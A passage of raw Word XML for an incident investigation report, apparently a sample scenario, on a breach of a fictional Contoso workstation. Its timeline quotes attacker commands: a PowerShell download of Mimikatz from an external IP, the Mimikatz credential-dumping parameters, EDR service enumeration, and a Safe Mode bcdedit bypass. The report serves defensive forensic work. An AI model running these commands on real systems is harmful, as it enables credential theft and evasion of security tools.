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D4B2A" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="4000" w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>DIGITAL FORENSICS &amp; INCIDENT RESPONSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32897C13" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>INCIDENT INVESTIGATION REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F69BB5E" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CONTOSO CORPORATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7645F683" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Security Breach - 03 February 2026</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3250"/>
      </w:tblGrid>
      <w:tr w:rsidR="007D40BD" w14:paraId="6DE19E48"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tcPr>
          <w:p w14:paraId="750EF8F9" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Classification:</w:t>
            </w:r>
          </w:p>
        </w:tc>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A724C2F" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t>CONFIDENTIAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D40BD" w14:paraId="6E045FA7"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tcPr>
          <w:p w14:paraId="03822FFD" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Incident Date:</w:t>
            </w:r>
          </w:p>
        </w:tc>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77ABBE" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
            <w:r>
              <w:t>03 February 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D40BD" w14:paraId="7C8528A9"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tcPr>
          <w:p w14:paraId="417F2A59" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Report Date:</w:t>
            </w:r>
          </w:p>
        </w:tc>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688788A" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
            <w:r>
              <w:t>16 February 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D40BD" w14:paraId="4A90BAFC"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tcPr>
          <w:p w14:paraId="1B75D621" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Lead Analyst:</w:t>
            </w:r>
          </w:p>
        </w:tc>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A477B3" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
            <w:r>
              <w:t>DFIR Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D622ECA" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="007D40BD">
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA9BBAC" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>EXECUTIVE SUMMARY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C91897B" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0653FEEA" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On 03 February 2026 at 10:47:34, CONTOSO Corporation experienced a sophisticated multi-stage </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cyber attack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on WORKSTATION-01 (10.50.10.15). User </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sarah.mitchell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> fell victim to a phishing attack that deployed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to harvest credentials, including Domain Administrator </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jennifer.hayes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. The threat actor then used Safe Mode boot manipulation to bypass and completely remove the CrowdStrike Falcon EDR, achieving full system compromise. The attack resulted in credential theft, EDR removal, data exfiltration of 245 MB, and deployment of ransomware encrypting 1,247 files (4.8 GB) on FILESERVER01.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F671892" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Timeline Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11267069" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:47:34 - Initial C2 connection to 185.220.101.42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB317AE" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">03/02/2026 10:47:36 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> downloaded (masqueraded as svchost.exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A03625" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:48:14 - Credentials stolen via LSASS memory access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0449EB4F" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:49:25 - CrowdStrike EDR detects tampering attempt (BLOCKED)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D4DC37" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:49:42 - Attacker configures Safe Mode boot to bypass EDR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B10EB64" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:51:20 - EDR successfully removed in Safe Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33234B1F" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:52:44 - System fully compromised, EDR absent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C05BE66" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Impact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6880"/>
      </w:tblGrid>
      <w:tr w:rsidR="007D40BD" w14:paraId="636D82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100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="33663C9A" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Compromised Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>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2FA8D9" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sarah.mitchell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jennifer.hayes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> (Domain Admin), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backup.service</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D40BD" w14:paraId="4AACB9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100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7B445566" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>EDR Status</w:t>
            </w:r>
          </w:p>
        </w:tc>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8D16B4" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRPr="00FB2C15" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00FB2C15">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Completely removed via Safe Mode bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D40BD" w14:paraId="6DD8C9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100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5F517F3B" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Data Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>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48AD9F7" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
            <w:r>
              <w:t>245 MB (M&amp;A documents, financial records, customer data, intellectual property)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D40BD" w14:paraId="349695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100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="30AE5587" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Ransomware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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B13E074" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
            <w:r>
              <w:t>1,247 files encrypted on FILESERVER01 (4.8 GB total)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FFC2898" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Critical Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ADFF06" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The attack succeeded despite operational EDR due to a sophisticated bypass technique:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491D5EAC" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Windows Credential Guard: NOT ENABLED - allowed plaintext credential access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C5CFFE" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>LSASS Protected Process Light (PPL): NOT ENABLED - allowed memory dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC8FF24" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>CrowdStrike Tamper Protection: ACTIVE - successfully blocked direct service termination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F0E6F0" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Safe Mode Bypass: Attacker used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bcdedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to boot into Safe Mode, where EDR drivers do not load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED85D60" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>EDR Kernel Driver: Cannot load in Safe Mode - complete security control bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D83240F" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRPr="00FB2C15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This was not an EDR failure. This was a sophisticated adversary exploiting a legitimate Windows feature (Safe Mode) to bypass security controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0B3AC7" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="007D40BD">
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38DAAA47" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>DETAILED INCIDENT TIMELINE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C3324C" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 1: Initial Access &amp; C2 (10:47:34 - 10:47:38)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566D528B" w14:textId="771CF716" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:47:34 - PowerShell establishes C2 connection to 185.220.101.42 (external threat actor infrastructure). Sysmon Event ID 3 captured the network connection from C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.</w:t>
      </w:r>
      <w:r w:rsidR="00FB2C15">
        <w:t xml:space="preserve"> Explorer spawned explorer from Outlook which then launched </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB2C15">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB2C15">
        <w:t xml:space="preserve">  .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B047C88" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:47:35 - PowerShell Script Block Logging (Event ID 4104) captures obfuscated payload execution. Script attempts to invoke commands on remote systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362A45AC" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">03/02/2026 10:47:36 - PowerShell Module Logging (Event ID 4103) captures </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DownloadFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command downloading </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from http://185.220.101.42/tools/mimikatz.exe. Target filename: C:\Users\sarah.mitchell\AppData\Local\Temp\svchost.exe (FILE MASQUERADING).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBFB047" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:47:38 - Sysmon Event ID 11 (File Create) confirms malicious file written to disk masqueraded as legitimate Windows process 'svchost.exe'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADA50A2" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 2: Credential Theft (10:48:12 - 10:48:18)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54544392" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">03/02/2026 10:48:12 - Windows Event ID 4688 confirms OUTLOOK.EXE spawned the malicious PowerShell process, establishing phishing email as initial access vector. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (svchost.exe) executes with parameters: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>privilege::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">debug </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>logonpasswords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB12775" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:48:13 - Windows Event ID 4673 (Privilege Use) indicates privileged service called by svchost.exe (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A43912B" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:48:14 - Sysmon Event ID 10 (Process Access) shows svchost.exe accessing lsass.exe memory. Sysmon Event ID 8 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CreateRemoteThread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) indicates remote thread injection into LSASS process. CREDENTIALS HARVESTED: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sarah.mitchell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jennifer.hayes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Domain Admin), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>backup.service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D24D40B" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">03/02/2026 10:48:18 - Sysmon Event ID 5 confirms </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> process termination. Mission accomplished - attacker has Domain Admin credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E79764" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 3: EDR Detection &amp; Tamper Attempt (10:49:05 - 10:49:25)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A7B8AA" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:49:05 - PowerShell Event ID 4103 shows attacker enumerating CrowdStrike Falcon service: Get-Service | Name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CSFalcon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1864035D" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:49:07 - Attacker searches for all security products: Get-Process | Name="*crowd*,*carbon*,*defender*,*sentinel*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE1C3B4" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:49:10 - Attacker queries kernel driver: Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CimInstance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Win32_SystemDriver | Name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CSAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231D9DB8" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">03/02/2026 10:49:20 - PowerShell attempts to stop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CSFalconService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Result: ERROR: Access Denied - Service protected by tamper protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423860B4" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRPr="00FB2C15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">03/02/2026 10:49:25 - CROWDSTRIKE EDR ALERT (Application Event ID 1000): Detection: Tamper Protection Violation. Technique: T1562.001 (Disable/Modify Tools). Process: powershell.exe. User: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>sarah.mitchell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
